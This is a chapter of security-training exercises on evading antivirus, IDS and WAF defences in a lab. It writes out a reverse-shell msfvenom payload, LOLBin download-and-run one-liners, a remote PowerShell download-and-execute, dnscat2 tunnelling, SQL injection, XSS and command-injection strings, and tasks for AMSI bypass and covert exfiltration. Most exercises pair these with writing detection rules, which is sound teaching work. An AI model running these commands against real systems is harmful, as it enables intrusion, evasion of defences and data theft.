Chapter 27 Exercises: Evasion and Anti-Detection Techniques
⚠️ Authorization Reminder: All exercises must be performed in your personal lab environment or on systems you have explicit authorization to test. Never use evasion techniques against production systems without proper authorization. The purpose of these exercises is to build detection and defense skills.
Exercise 27.1: Baseline Detection Testing (Beginner)
Objective: Establish a detection baseline by testing how quickly default payloads are detected.
Setup: Windows 10 VM with Windows Defender enabled, Sysmon installed with SwiftOnSecurity configuration.
Tasks:
1. Generate a standard Meterpreter reverse TCP payload using msfvenom: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<kali_ip> LPORT=4444 -f exe -o baseline_test.exe
2. Transfer the payload to the Windows VM using a Python HTTP server
3. Record exactly what happens: Is it blocked on download? On disk? On execution?
4. Examine the Windows Defender event logs and Sysmon logs. What specific detection triggered?
5. Submit the payload to VirusTotal and document how many AV engines detect it (note: do NOT submit real engagement payloads to VirusTotal)
6. Write a short report documenting the detection timeline and mechanisms
Expected Outcome: The payload should be detected immediately by Windows Defender via signature matching. This establishes your baseline for comparing evasion techniques.
Exercise 27.2: Encoding Iteration Analysis (Beginner)
Objective: Understand the limitations of simple encoding as an evasion technique.
Tasks:
1. Generate payloads with increasing levels of shikata_ga_nai encoding:
- No encoding: -f exe
- 1 iteration: -e x86/shikata_ga_nai -i 1 -f exe
- 5 iterations: -e x86/shikata_ga_nai -i 5 -f exe
- 10 iterations: -e x86/shikata_ga_nai -i 10 -f exe
- 20 iterations: -e x86/shikata_ga_nai -i 20 -f exe
2. Record the file size of each variant
3. Test each against Windows Defender (in your lab VM)
4. Document which encodings (if any) evade detection
5. Analyze why simple encoding is insufficient against modern AV
Discussion Questions: Why does increasing encoding iterations not proportionally improve evasion? What detection method makes encoding-only approaches ineffective?
Exercise 27.3: LOLBin Reconnaissance Chain (Intermediate)
Objective: Perform a complete reconnaissance operation using only built-in Windows tools.
Scenario: You have a command shell on a Windows domain-joined workstation at MedSecure. Gather as much information as possible without using any custom tools.
Tasks:
1. System information: Use systeminfo, hostname, whoami /all to gather local system details
2. Network information: Use ipconfig /all, netstat -ano, arp -a, route print
3. Domain information: Use net user /domain, net group "Domain Admins" /domain, nltest /dclist:
4. Process enumeration: Use tasklist /v, wmic process list brief
5. Service enumeration: Use sc query, wmic service list brief
6. Scheduled tasks: Use schtasks /query /fo TABLE /nh
7. Installed software: Use wmic product get name,version
8. File search: Use dir /s /b C:\Users\*.kdbx C:\Users\*.conf C:\Users\*.config 2>nul
9. Document each command, its MITRE ATT&CK mapping, and what a defender should monitor for
10. Propose Sysmon rules or SIGMA detection rules for at least five of these commands
Deliverable: A reconnaissance report generated entirely from LOLBin output, plus a detection strategy document.
Exercise 27.4: Sysmon Detection Engineering (Intermediate)
Objective: Build and test Sysmon detection rules for common LOLBin abuse.
Tasks:
1. Install Sysmon with the default SwiftOnSecurity configuration on your Windows VM
2. Execute the following LOLBin commands and capture the Sysmon events:
- certutil -urlcache -split -f http://<kali_ip>/test.txt C:\temp\test.txt
- mshta javascript:a=new%20ActiveXObject("Wscript.Shell");a.Run("calc.exe");close();
- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";document.write();h=new%20ActiveXObject("WScript.Shell");h.Run("calc");
- regsvr32 /s /n /u /i:http://<kali_ip>/test.sct scrobj.dll
3. For each command, identify which Sysmon Event IDs were generated
4. Write a custom Sysmon configuration XML snippet that enhances detection for each LOLBin
5. Test your enhanced configuration by re-running the commands
6. Document any evasion that your enhanced rules still miss
Bonus: Convert your Sysmon rules to SIGMA format for cross-platform compatibility.
Exercise 27.5: DNS Tunneling Lab (Intermediate)
Objective: Set up a DNS tunnel and analyze its network signatures.
Tasks:
1. Set up dnscat2 server on your Kali machine: ruby dnscat2.rb --dns "domain=tunnel.yourdomain.lab,host=<kali_ip>" --no-cache
2. On the Windows VM, run the dnscat2 client (PowerShell version)
3. Transfer a text file through the DNS tunnel
4. Capture the traffic with Wireshark during the entire session
5. Analyze the DNS queries in Wireshark:
- What is the average query length?
- What is the query frequency (queries per second)?
- What record types are used (A, AAAA, TXT, CNAME)?
- Are there any patterns in the subdomain labels?
6. Compare the DNS traffic profile to normal DNS traffic from web browsing
7. Write Snort or Suricata rules to detect the DNS tunnel based on your analysis
8. Test your detection rules against the captured PCAP
Expected Outcome: You should observe significantly longer subdomain labels, higher query frequency, and unusual record types compared to normal DNS traffic.
Exercise 27.6: WAF Bypass Challenge (Intermediate)
Objective: Practice bypassing WAF rules on a local deployment.
Setup: Deploy ModSecurity with OWASP Core Rule Set (CRS) on Apache, with DVWA behind it.
Tasks:
1. Install and configure ModSecurity with CRS v3.x
2. Access DVWA through ModSecurity and attempt standard attacks:
- SQL injection: ' OR 1=1 --
- XSS: <script>alert(1)</script>
- Command injection: ; cat /etc/passwd
3. Document which attacks are blocked and the specific CRS rule IDs that triggered
4. For each blocked attack, develop three bypass variants using techniques from Section 27.6
5. Test each bypass and record success/failure
6. For successful bypasses, write a custom ModSecurity rule that would detect your bypass
7. Calculate the bypass rate: what percentage of your bypass attempts succeeded?
Discussion: What does your bypass rate tell you about relying solely on a WAF for security?
Exercise 27.7: C2 Framework Comparison (Intermediate)
Objective: Compare C2 frameworks by deploying and testing Sliver and Mythic.
Tasks: 1. Deploy Sliver C2 on your Kali machine 2. Generate an mTLS implant for your Windows VM 3. Establish a session and perform basic operations (whoami, ps, ls) 4. Capture the network traffic with Wireshark and analyze the mTLS communication 5. Deploy Mythic C2 (Docker-based) on your Kali machine 6. Generate an HTTP agent (Apollo) for your Windows VM 7. Establish a session and perform the same basic operations 8. Capture and analyze the Mythic HTTP traffic 9. Compare the two frameworks across: - Setup complexity - Agent detection by Windows Defender - Network traffic visibility and fingerprinting potential - Post-exploitation capability - Operator experience 10. Write a comparison report recommending which framework you would choose for different engagement types
Exercise 27.8: Malleable C2 Profile Analysis (Advanced)
Objective: Understand how malleable C2 profiles work by analyzing and modifying Cobalt Strike profiles.
Note: This exercise can be done with publicly available malleable C2 profile examples even without a Cobalt Strike license.
Tasks:
1. Download the official Cobalt Strike Malleable C2 profile repository from GitHub
2. Analyze the amazon.profile and gmail.profile examples
3. For each profile, document:
- HTTP request structure (URI, headers, parameters)
- HTTP response structure (headers, body format)
- How the C2 data is embedded in seemingly legitimate traffic
- Beacon sleep time and jitter settings
4. Write a custom profile that mimics traffic to a legitimate service of your choice
5. Identify detection opportunities for each profile (what makes it distinguishable from real traffic?)
6. Research JA3 fingerprints for Cobalt Strike and document how they differ from legitimate browser JA3 fingerprints
Exercise 27.9: AV/EDR Evasion Techniques Research (Advanced)
Objective: Research and document current evasion techniques through published security research.
Tasks: 1. Research the following evasion technique categories and write a technical summary of each: - Direct syscalls and SysWhispers/HellsGate - Sleep obfuscation and heap encryption - ETW patching/blinding - AMSI bypass techniques - Callback-based shellcode execution - Module stomping / DLL hollowing 2. For each technique, document: - How it works at a technical level - What detection mechanism it evades - Known detection strategies - Public tools that implement it 3. Create a matrix mapping evasion techniques to the detection layers they bypass 4. Identify which combinations of techniques provide the most comprehensive evasion
Note: This is a research exercise. Do not implement these techniques against any system without proper authorization.
Exercise 27.10: AMSI Bypass and Detection (Advanced)
Objective: Understand AMSI bypass techniques and build detection capabilities.
Tasks:
1. On your Windows lab VM with Defender enabled, open PowerShell and run:
powershell
Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')
2. Observe the AMSI detection -- document the error message and event log entries
3. Research three published AMSI bypass techniques (e.g., Matt Graeber's reflection bypass, AMSI.dll patching, CLR hooking)
4. For each bypass, document:
- The mechanism (how does it disable AMSI?)
- The detection opportunity (how can defenders detect the bypass itself?)
5. Implement enhanced Sysmon and PowerShell logging that would detect AMSI bypass attempts
6. Test your detection against the bypass techniques (in your lab only)
Exercise 27.11: Network Evasion with Fragmentation (Intermediate)
Objective: Test how IP fragmentation affects IDS detection.
Setup: Kali Linux, Windows target VM, Snort or Suricata IDS.
Tasks:
1. Configure Snort/Suricata on a VM positioned between your Kali machine and the target
2. Create a Snort rule that detects a specific string in HTTP traffic (e.g., "MALICIOUS_TEST_STRING")
3. Send a request containing the detection string without fragmentation and verify detection
4. Use Nmap with -f and --mtu to send fragmented probes:
- nmap -f -sS -p 80 target
- nmap --mtu 16 -sS -p 80 target
- nmap --mtu 8 -sS -p 80 target
5. Use fragrouter or custom scapy scripts to send fragmented HTTP requests containing the detection string
6. Analyze which fragmentation sizes evade your IDS rules
7. Configure the IDS for fragment reassembly and retest
8. Document the effectiveness of fragmentation evasion with and without reassembly
Exercise 27.12: Building a LOLBin Detection Dashboard (Intermediate)
Objective: Create a monitoring dashboard for LOLBin abuse detection.
Tasks:
1. Configure Windows Event Log forwarding from your lab VMs to a central collector
2. Set up an ELK stack (Elasticsearch, Logstash, Kibana) or use Windows Event Viewer
3. Create detection queries/filters for the following LOLBin abuse patterns:
- certutil.exe downloading files (command line contains -urlcache)
- mshta.exe executing remote content
- rundll32.exe with suspicious command-line arguments
- regsvr32.exe with /i:http parameter
- bitsadmin.exe creating download jobs
- PowerShell with -encodedcommand or -enc parameter
4. Build a Kibana dashboard (or equivalent) showing:
- Timeline of LOLBin executions
- Most frequently abused LOLBins
- Unusual parent-child process relationships
- Alert status for each detection rule
5. Test your dashboard by executing sample LOLBin commands and verifying detection
Exercise 27.13: Red Team vs. Blue Team Simulation (Advanced)
Objective: Practice both offensive evasion and defensive detection in a simulated engagement.
Scenario: Work with a partner or alternate between red and blue team roles.
Red Team Tasks: 1. Establish initial access to a target VM using any method 2. Deploy a C2 agent that evades the installed AV/EDR 3. Perform reconnaissance using only LOLBins 4. Move laterally to a second VM without triggering alerts 5. Exfiltrate a specific file through a covert channel (DNS, ICMP, or HTTP tunneling) 6. Document every technique used and its ATT&CK mapping
Blue Team Tasks: 1. Configure comprehensive logging (Sysmon, PowerShell ScriptBlock, Windows Event Forwarding) 2. Deploy detection rules for common evasion techniques 3. Monitor for indicators of compromise during the red team exercise 4. Create a timeline of detected (and missed) activities 5. For each missed detection, propose a new detection rule
Joint Review: Compare red team actions against blue team detections. Calculate the detection rate and discuss improvements.
Exercise 27.14: Custom Payload Encoder Development (Advanced)
Objective: Understand payload encoding by building a simple educational encoder.
Tasks:
1. Review the example-01-payload-encoder.py code in this chapter's code directory
2. Extend the encoder to support additional encoding methods:
- Caesar cipher with variable rotation
- Base32 encoding
- Custom substitution cipher
3. Write a corresponding decoder for each encoding method
4. Test each encoding against a simple byte pattern (not actual shellcode -- use a benign test string)
5. Analyze the encoded output:
- Does it maintain the same entropy profile?
- Are there identifiable patterns in the encoded data?
- How does the decoder stub affect detection?
6. Research why custom encoding alone is insufficient against modern detection and document your findings
⚠️ This exercise is for educational understanding of encoding concepts. Do not use custom encoders to create actual evasion payloads outside of authorized engagements.
Exercise 27.15: Evasion Technique Documentation Project (Beginner-Intermediate)
Objective: Build a comprehensive reference document for evasion techniques and their detections.
Tasks: 1. Create a spreadsheet or database with the following columns: - Technique name - MITRE ATT&CK ID - Category (endpoint, network, application) - Description - Detection layer(s) it evades - Known detection methods - Tools that implement it - Difficulty (beginner/intermediate/advanced) - References 2. Populate at least 25 entries covering techniques from this chapter 3. For each technique, rate its current effectiveness (high/medium/low) based on your research 4. Identify gaps in your detection coverage based on this analysis 5. Present your findings as a "Detection Coverage Heat Map" showing which technique categories have strong vs. weak detection
Deliverable: A reference document that can serve as both a red team playbook and a blue team detection checklist.
Exercise 27.16: Covert Channel Capacity Analysis (Advanced)
Objective: Measure the practical throughput and detectability of different covert channels.
Tasks: 1. Set up three different covert channels in your lab: - DNS tunneling (using dnscat2 or iodine) - ICMP tunneling (using ptunnel or icmpsh) - HTTP tunneling (using Chisel or a custom solution) 2. For each channel, measure: - Maximum throughput (bytes per second) - Latency (round-trip time for a command) - Reliability (packet loss rate under normal conditions) - Stealth (how visible is the traffic in Wireshark?) 3. Transfer a 1MB file through each channel and time the transfer 4. Capture and analyze the traffic patterns: - Query/packet frequency - Payload sizes - Protocol anomalies 5. Write IDS rules to detect each covert channel 6. Rank the channels by stealth, speed, and reliability 7. Recommend which channel to use for different engagement scenarios (low-bandwidth C2 vs. bulk data exfiltration)
Challenge Exercise: Full Evasion Chain (Advanced)
Objective: Chain multiple evasion techniques into a complete, undetected operation.
Scenario: Your target lab environment has: - Windows Defender on all endpoints - Sysmon with SwiftOnSecurity configuration - Suricata IDS monitoring network traffic - ModSecurity WAF on the web server
Challenge: Starting from a web application vulnerability (use DVWA or similar), achieve the following without triggering any alerts: 1. Bypass the WAF to exploit a vulnerability 2. Obtain a shell that evades endpoint detection 3. Perform reconnaissance using only LOLBins 4. Establish a persistent C2 channel using a covert protocol 5. Exfiltrate a target file through the covert channel
Scoring: - 0 alerts triggered: Expert level - 1-2 alerts triggered: Advanced level - 3-5 alerts triggered: Intermediate level - 5+ alerts triggered: Keep practicing!
Documentation: Regardless of your score, document every step, every alert (or lack thereof), and propose both offensive improvements and defensive enhancements.